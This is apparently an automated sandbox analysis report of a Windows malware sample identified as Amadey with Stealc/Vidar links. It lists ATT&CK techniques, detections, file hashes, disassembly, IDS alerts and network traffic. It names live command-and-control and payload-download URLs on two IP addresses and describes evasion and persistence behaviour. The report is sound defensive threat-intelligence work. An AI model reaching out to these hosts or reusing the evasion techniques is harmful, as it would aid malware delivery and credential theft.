                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    251
                    Virtualization/Sandbox Evasion
                    LSASS Memory641
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information
                    NTDS251
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1502468 Sample: file.exe Startdate: 01/09/2024 Architecture: WINDOWS Score: 100 26 Suricata IDS alerts for network traffic 2->26 28 Found malware configuration 2->28 30 Antivirus detection for URL or domain 2->30 32 6 other signatures 2->32 6 file.exe 5 2->6         started        10 explorti.exe 16 2->10         started        13 explorti.exe 2->13         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\explorti.exe, PE32 6->18 dropped 20 C:\Users\...\explorti.exe:Zone.Identifier, ASCII 6->20 dropped 34 Detected unpacking (changes PE section rights) 6->34 36 Tries to evade debugger and weak emulator (self modifying code) 6->36 38 Tries to detect virtualization through RDTSC time measurements 6->38 15 explorti.exe 6->15         started        22 185.215.113.19, 49763, 49764, 49765 WHOLESALECONNECTIONSNL Portugal 10->22 24 185.215.113.16, 49776, 49777, 49778 WHOLESALECONNECTIONSNL Portugal 10->24 40 Hides threads from debuggers 10->40 42 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->42 44 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->44 file5 signatures6 process7 signatures8 46 Antivirus detection for dropped file 15->46 48 Detected unpacking (changes PE section rights) 15->48 50 Tries to detect sandboxes and other dynamic analysis tools (window names) 15->50 52 5 other signatures 15->52

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.19/Vi9leo/index.phpO100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exeded100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php100%Avira URL Cloudmalware
                    http://185.215.113.16/steam/random.exe6522427f100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php0100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpWindows100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php00100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exe100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpb100%Avira URL Cloudphishing
                    http://185.215.113.16/fae1daa8e9eb4fff7b5c630804042ba5ce9024154500m100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exel100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exe00100%Avira URL Cloudphishing
                    http://185.215.113.16/steam/random.exem32100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpoft100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpw_b100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php0=100%Avira URL Cloudphishing
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.19/Vi9leo/index.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.16/steam/random.exededexplorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.php0explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phpOexplorti.exe, 00000006.00000002.2932965487.00000000014F7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exe6522427fexplorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phpWindowsexplorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.php00explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exeexplorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phpbexplorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/fae1daa8e9eb4fff7b5c630804042ba5ce9024154500mexplorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exelexplorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exe00explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.16/steam/random.exem32explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phpoftexplorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.phpw_bexplorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    http://185.215.113.19/Vi9leo/index.php0=explorti.exe, 00000006.00000002.2932965487.00000000014E5000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    185.215.113.19
                    unknownPortugal
                    206894WHOLESALECONNECTIONSNLtrue
                    185.215.113.16
                    unknownPortugal
                    206894WHOLESALECONNECTIONSNLfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1502468
                    Start date and time:2024-09-01 17:35:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 16s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@5/3@0/2
                    EGA Information:
                    • Successful, ratio: 25%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target explorti.exe, PID 7436 because there are no executed function
                    • Execution Graph export aborted for target explorti.exe, PID 7456 because there are no executed function
                    • Execution Graph export aborted for target file.exe, PID 7252 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    11:37:01API Interceptor173131x Sleep call for process: explorti.exe modified
                    16:36:02Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.19file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    No context
                    No context
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1900032
                    Entropy (8bit):7.953681123547953
                    Encrypted:false
                    SSDEEP:49152:bxqFd8IXr3G0NPQQdiwHm+34RapwXKby8Y3O:bxqbhrGoPQQJHlp9Ye
                    MD5:0F2694844EB16391E15196E17E545F0B
                    SHA1:CB6CBD6A90349AFA4624A221B3350AF44FEB4D71
                    SHA-256:53F9B3B2EA25424BAF94DA442973F4EFD71E1218A3B837600334D97898EBFD7E
                    SHA-512:51179C080CE6DCE08E8C78E392E20D283C0052E91ED3C4C651B9E53741A3C720F6E87D393EAF0CF8BED54A85D4C92699910B5D0FE237F8DBDCC75D6FE9CD3CD6
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f.............................0K...........@..........................`K...........@.................................W...k.............................K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...wugfyyhr.....01.....................@...mmvmwoim..... K.....................@....taggant.0...0K.."..................@...........................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288
                    Entropy (8bit):3.4429251365730273
                    Encrypted:false
                    SSDEEP:6:hXhgX4RKUEZ+lX1cI1l6lm6tPjgsW2YRZuy0lbEtze1lEt0:zK4RKQ1cag7jzvYRQVAtzqut0
                    MD5:2B2A3A4CAB4E75337101DA97B62ACF22
                    SHA1:59764E821718F6F214403AEF0B255A1999977EE2
                    SHA-256:6542529AB5C06C0BB7634BAA48D0E25F2F588A0AD0DC75532ABD3620B7227C84
                    SHA-512:495B565E355DF51BB7748951865F03B1E40029A65A4758693E2B778E7F4ABBDD3D02B7D8EC659D75160090E55FE5EA175B8C11FDBEC2178E312F9C5BD3496FF6
                    Malicious:false
                    Reputation:low
                    Preview:.....K'....J......X.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................%.@3P.........................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.953681123547953
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'900'032 bytes
                    MD5:0f2694844eb16391e15196e17e545f0b
                    SHA1:cb6cbd6a90349afa4624a221b3350af44feb4d71
                    SHA256:53f9b3b2ea25424baf94da442973f4efd71e1218a3b837600334d97898ebfd7e
                    SHA512:51179c080ce6dce08e8c78e392e20d283c0052e91ed3c4c651b9e53741a3c720f6e87d393eaf0cf8bed54a85d4c92699910b5d0fe237f8dbdcc75d6fe9cd3cd6
                    SSDEEP:49152:bxqFd8IXr3G0NPQQdiwHm+34RapwXKby8Y3O:bxqbhrGoPQQJHlp9Ye
                    TLSH:889533BC4DE32BFECC50CC7AA431D30F59D6EE6A98D10584BF6464EEA1C9723086649D
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x8b3000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007FFAACCFCF0Ah
                    paddusb mm3, qword ptr [eax+eax]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    jmp 00007FFAACCFEF05h
                    inc ecx
                    push bx
                    dec esi
                    dec ebp
                    das
                    xor al, 36h
                    dec edi
                    bound ecx, dword ptr [ecx+4Ah]
                    dec edx
                    insd
                    push edi
                    dec eax
                    dec eax
                    jbe 00007FFAACCFCF72h
                    push esi
                    dec edx
                    popad
                    je 00007FFAACCFCF6Bh
                    push edx
                    dec esi
                    jc 00007FFAACCFCF7Ah
                    cmp byte ptr [ebx], dh
                    push edx
                    jns 00007FFAACCFCF47h
                    or eax, 49674B0Ah
                    cmp byte ptr [edi+43h], dl
                    jnc 00007FFAACCFCF4Dh
                    bound eax, dword ptr [ecx+30h]
                    pop edx
                    inc edi
                    push esp
                    push 43473163h
                    aaa
                    push edi
                    dec esi
                    xor ebp, dword ptr [ebx+59h]
                    push edi
                    push edx
                    pop eax
                    je 00007FFAACCFCF57h
                    xor dl, byte ptr [ebx+2Bh]
                    popad
                    jne 00007FFAACCFCF4Ch
                    dec eax
                    dec ebp
                    jo 00007FFAACCFCF43h
                    xor dword ptr [edi], esi
                    inc esp
                    dec edx
                    dec ebp
                    jns 00007FFAACCFCF50h
                    insd
                    jnc 00007FFAACCFCF70h
                    aaa
                    inc esp
                    inc ecx
                    inc ebx
                    xor dl, byte ptr [ecx+4Bh]
                    inc edx
                    inc esp
                    bound esi, dword ptr [ebx]
                    or eax, 63656B0Ah
                    jno 00007FFAACCFCF58h
                    push edx
                    insb
                    js 00007FFAACCFCF71h
                    outsb
                    inc ecx
                    jno 00007FFAACCFCF52h
                    push ebp
                    inc esi
                    pop edx
                    xor eax, dword ptr [ebx+36h]
                    push eax
                    aaa
                    imul edx, dword ptr [ebx+58h], 4Eh
                    aaa
                    inc ebx
                    jbe 00007FFAACCFCF4Ch
                    dec ebx
                    js 00007FFAACCFCF43h
                    jne 00007FFAACCFCF31h
                    push esp
                    inc bp
                    outsb
                    inc edx
                    popad
                    dec ebx
                    insd
                    dec ebp
                    inc edi
                    xor dword ptr [ecx+36h], esp
                    push 0000004Bh
                    sub eax, dword ptr [ebp+33h]
                    jp 00007FFAACCFCF5Ch
                    dec edx
                    xor bh, byte ptr [edx+56h]
                    bound eax, dword ptr [edi+66h]
                    jbe 00007FFAACCFCF3Ah
                    dec eax
                    or eax, 506C720Ah
                    aaa
                    xor dword ptr fs:[ebp+62h], ecx
                    arpl word ptr [esi], si
                    inc esp
                    jo 00007FFAACCFCF73h
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b13d40x10wugfyyhr
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4b13840x18wugfyyhr
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x680000x2dc00f5502b320b12412e8336f0d5e1173c5fFalse0.9996691427595629data7.978167044065446IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x690000x1e00x200a6ff479f775776f9454f78f60c8924a1False0.58203125data4.507732056601817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x6b0000x2a80000x2001c37394bcad8e11ec877dc50d286484aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    wugfyyhr0x3130000x19f0000x19e6009635850d5c2e455d716a41c1a8a4d44dFalse0.9944699754901961data7.953087307539596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    mmvmwoim0x4b20000x10000x4006fae0b38dbdcfeacf3f27c3b6fe5cb6bFalse0.783203125data6.1354089192973875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4b30000x30000x2200c476f2b37d045b5011ae7d3c3dcd02a1False0.39051011029411764DOS executable (COM)4.214934926183452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4b13e40x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                    DLLImport
                    kernel32.dlllstrcpy
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                    2024-09-01T17:37:04.208529+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M314977580192.168.2.4185.215.113.19
                    2024-09-01T17:37:19.841016+0200TCP2856122ETPRO MALWARE Amadey CnC Response M118049775185.215.113.19192.168.2.4
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 1, 2024 17:37:02.365422010 CEST4976380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.370364904 CEST8049763185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.370471954 CEST4976380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.370641947 CEST4976380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.375829935 CEST8049763185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.375844002 CEST8049763185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.375936031 CEST4976380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.375987053 CEST4976380192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.377037048 CEST4976480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.380858898 CEST8049763185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.380964994 CEST8049763185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.381865025 CEST8049764185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.381980896 CEST4976480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.382051945 CEST4976480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.387080908 CEST8049764185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.387193918 CEST8049764185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.387207031 CEST4976480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.387253046 CEST4976480192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.393137932 CEST8049764185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.393213987 CEST8049764185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.502090931 CEST4976580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.508363962 CEST8049765185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.508498907 CEST4976580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.508703947 CEST4976580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.515953064 CEST8049765185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.516022921 CEST4976580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.516055107 CEST4976580192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.516346931 CEST8049765185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.519754887 CEST4976680192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.524631977 CEST8049765185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.524635077 CEST8049765185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.525700092 CEST8049766185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.525783062 CEST4976680192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.525935888 CEST4976680192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.531183004 CEST8049766185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.532484055 CEST8049766185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.642769098 CEST4976780192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.650940895 CEST8049767185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.651078939 CEST4976780192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.651249886 CEST4976780192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.659882069 CEST8049767185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.659885883 CEST8049767185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.659950972 CEST4976780192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.659990072 CEST4976780192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.660746098 CEST4976880192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.672836065 CEST8049767185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.673106909 CEST8049767185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.673485041 CEST8049768185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.673583984 CEST4976880192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.673691988 CEST4976880192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.680001020 CEST8049768185.215.113.19192.168.2.4
                    Sep 1, 2024 17:37:02.680080891 CEST4976880192.168.2.4185.215.113.19
                    Sep 1, 2024 17:37:02.680102110 CEST4976880192.168.2.4185.215.113.19
